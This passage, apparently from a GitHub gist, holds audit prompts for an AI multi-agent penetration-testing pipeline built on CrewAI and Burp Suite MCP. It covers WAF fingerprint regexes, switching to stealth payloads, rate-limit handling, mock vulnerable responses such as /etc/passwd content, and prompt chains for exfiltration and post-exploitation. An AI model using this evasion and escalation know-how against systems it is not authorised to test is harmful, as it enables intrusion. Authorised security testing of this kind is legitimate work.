    ("akamai", re.compile(r"akamai|ak_bmsc|bm_sz", re.I)),
    ("aws_waf", re.compile(r"x-amzn-requestid|awswaf", re.I)),
    ("modsecurity", re.compile(r"mod_security|modsecurity|NOYB", re.I)),
]
# If WAF detected → switch all tools to stealth payload variants

### Scenario 2: Target with Rate Limiting (429 after 10 requests)
- Does `fuzzing_agent` respect 429 responses and back off?
- Does `validation_executor` have any rate limiting awareness?
- Can the pipeline automatically detect rate limiting and throttle itself?

Fix needed in `burp_mcp_client.py` or tool base class:
```python
# After each call_with_retry, check response for 429
# If 429 detected: exponential backoff, max 3 retries, then mark tool as RATE_LIMITED
# Pass rate_limited flag to next tool so it knows to slow down

### Scenario 3: Large Burp History (10,000+ requests)
- Does `http_analyst` paginate correctly through 10k requests?
- Does the regex triage logic still work at scale without LLM context overflow?
- Is there deduplication to avoid testing the same endpoint 100 times?

Check: `get_proxy_http_history` `count` and `offset` parameters — is pagination implemented?
Implement: Dedup by `(method, path, param_set)` before passing candidates to validation.

### Scenario 4: Authenticated Endpoints with Short-Lived Tokens
- What happens when the session token in Burp history expires mid-run?
- Does `burp_mcp_client.py` detect session expiry (401/302 to login) and alert the operator?
- Is there a mechanism to refresh tokens, or does the pipeline silently produce false negatives?

Review `detect_session_expiry()` in `burp_mcp_client.py`:
- Is it called after every request?
- Does it surface to the agent as an actionable signal, or silently swallowed?

### Scenario 5: Missing Findings — False Negative Rate
Design a test suite of "known-vulnerable" mock responses and check if each tool returns CONFIRMED:
```python
KNOWN_VULNERABLE_RESPONSES = {
    "sqli_error": {"body": "You have an error in your SQL syntax near '1'"},
    "sqli_blind_time": {"response_time_ms": 5200, "baseline_time_ms": 120},
    "xss_reflected": {"body": "<html>...hello <script>..."},  # payload reflected unencoded
    "ssrf_internal": {"body": "AMI ID: ami-12345678"},         # AWS IMDS response
    "idor": {"statusCode": 200, "body": '{"email": "other@user.com"}'},  # different user data
    "cmd_injection": {"body": "root:x:0:0:root:/root:/bin/bash"},  # /etc/passwd content
}

# For each known-vulnerable response, call the detection tool
# Assert: result["status"] == "CONFIRMED"
# If any returns NOT_CONFIRMED → false negative → fix detection logic

### Deliverables
For each scenario:
1. Identify specific code that fails
2. Implement the fix
3. Add a test that simulates the scenario
4. Rate the overall pipeline readiness for real engagements: 
   - Stealth against WAF: X/10
   - Rate limit handling: X/10
   - Scale (10k history): X/10
   - Session management: X/10
   - False negative rate: X/10

Final report: "This pipeline is ready for real engagements EXCEPT: [list blockers]"

⚡ Quick Reference — Prompt Combinations by Operation

Operasi Kombinasi Prompt
Prepare for new engagement #1 → #9 (gap audit) → #6 (tune aggression)
Add new vuln class #1 → #5 (new module) → #3 (add payloads)
Maximize bug bounty payout #1 → #7 → #4 (chain builder) → #8 (exfil proof)
Fix pipeline blind spots #1 → #2 (discovery) → #9 (gaps) → #5
Harden against WAF #1 → #3 (payloads) → #10 (WAF scenario)
Post-exploitation depth #1 → #8 (exfil) → #4 (chain)
Full pipeline review #1 → #10 (full audit) → #6 (tune agents)

Pentest Crew — CrewAI + Burp Suite MCP multi-agent penetration testing pipeline. Use responsibly.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment